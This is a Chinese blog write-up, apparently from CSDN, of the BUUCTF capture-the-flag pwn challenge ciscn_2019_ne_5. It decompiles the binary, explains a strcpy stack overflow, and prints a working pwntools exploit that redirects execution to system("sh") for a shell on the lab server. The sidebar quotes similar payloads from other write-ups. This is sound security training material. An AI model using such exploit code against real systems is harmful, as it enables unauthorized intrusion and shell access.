BUU-ciscn_2019_ne_5

最新推荐文章于 2024-01-30 19:53:40 发布
最新推荐文章于 2024-01-30 19:53:40 发布
阅读量377 收藏 3
点赞数 2
分类专栏: Pwn-WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45771413/article/details/116211079
版权

检查保护

在这里插入图片描述

IDA

逻辑不是很复杂,

第一次提示输入admin密码,密码要输入administrator才能下一步

接着是输入功能选项(0~3)

第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src

在这里插入图片描述

第二个输出,进去只有一个put,一无所有

第三个是打印,里面发现了system函数

在这里插入图片描述

第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。

在这里插入图片描述

第五个才是’0’的退出

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+0h] [ebp-100h] BYREF
  char src[4]; // [esp+4h] [ebp-FCh] BYREF
  char v6[124]; // [esp+8h] [ebp-F8h] BYREF
  char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
  char v8[96]; // [esp+88h] [ebp-78h] BYREF
  int *v9; // [esp+F4h] [ebp-Ch]

  v9 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(v8, 0, sizeof(v8));
  *(_DWORD *)src = 48;
  memset(v6, 0, sizeof(v6));
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf("%100s", s1);
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  puts("Input your operation:");
  puts("1.Add a log.");
  puts("2.Display all logs.");
  puts("3.Print all logs.");
  printf("0.Exit\n:");
  __isoc99_scanf("%d", &v4);
  switch ( v4 )
  {
    case 0:
      exit(0);
      return result;
    case 1:
      AddLog(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 2:
      Display(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 3:
      Print();
      result = sub_804892B(argc, argv, envp);
      break;
    case 4:
      GetFlag(src);
      result = sub_804892B(argc, argv, envp);
      break;
    default:
      result = sub_804892B(argc, argv, envp);
      break;
  }
  return result;
}

解题

本来我想直接在功能选项输入4,但是弹出的flag是0……

在这里插入图片描述

可能直接跳转还是不行,这里看看能不能rop:

再次翻看四个选项,发现getflag有个strcpy,这里可以栈溢出跳转地址,dest栈空间0x48。拷贝的src可以在选项1里输入。

在这里插入图片描述

现在手里有了system,栈溢出点,就差/bin/sh

这里我找了很久没找到,暂时也没学libc库怎么调用,看大佬wp发现有个ffllush字符,可以截取里面的sh(太骚了),由于只截取部分字符,所以地址要手动偏移偏移。

在这里插入图片描述

我一开始不知道咋算,是按照小端序?要不要算\00?后面发现大佬用ROPgatget直接找关键字符串,服ORZ

在这里插入图片描述

0x080482E6到0x080482EA增加了4,应该是1个字符占一个地址,不是小端序,fflu刚好四个地址,\00在sh后面

EXP

👴吐了,sytem函数没点进去,调用错地址了,一直报错……

在这里插入图片描述

在这里插入图片描述

from pwn import *
p=remote('node3.buuoj.cn',29801)
context.log_level='debug'
p.recvuntil("password:")
p.sendline("administrator")
p.recvuntil("operation:")
p.sendline("1")
p.sendline('A'*0x48+'a'*4+p32(0x80484D0)+'a'*4+p32(0x080482EA))
p.recvuntil(":")
p.sendline('4')
p.interactive()

附:获取_system地址的其它写法:

system_plt = elf.plt['system']
system_addr=elf.sym['system']

flag

flag{e88eea8b-c04b-468e-a5c9-d6bb08c3547b}

坑&填坑

1.明明构造了system("/sh")为什么还要倒回去执行4号选项才能正常进入交互界面,否则报错

在这里插入图片描述

2./bin/sh 和 /sh有啥区别

没啥区别

ciscn_2019_ne_5
m0_52231248的博客
11-15 380
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
BUUciscn_2019_c_1
bzduanlei的博客
07-30 340
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1918
buuctf ciscn_2019_ne_5题目分析
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1139
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 846
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
最新发布
2301_79326813的博客
01-30 532
这道题好像和buuciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 480
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4223
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
ciscn_2019_en_2
m0sway的博客
03-25 1722
ciscn_2019_en_2 WriteUp BUU_PWN
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2544
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 258
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
BUUCTFPWN】ciscn_2019_ne_5
m0_55368674的博客
01-15 289
BUUCTFPWN】ciscn_2019_ne_5
ciscn_2019_ne_5BUUCTF】
qq_41696518的博客
08-31 649
ciscn_2019_ne_5 BUUCTF
[PWN]ciscn_2019_ne_5
LDX的博客
11-27 321
PWN ciscn_2019_ne_5
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值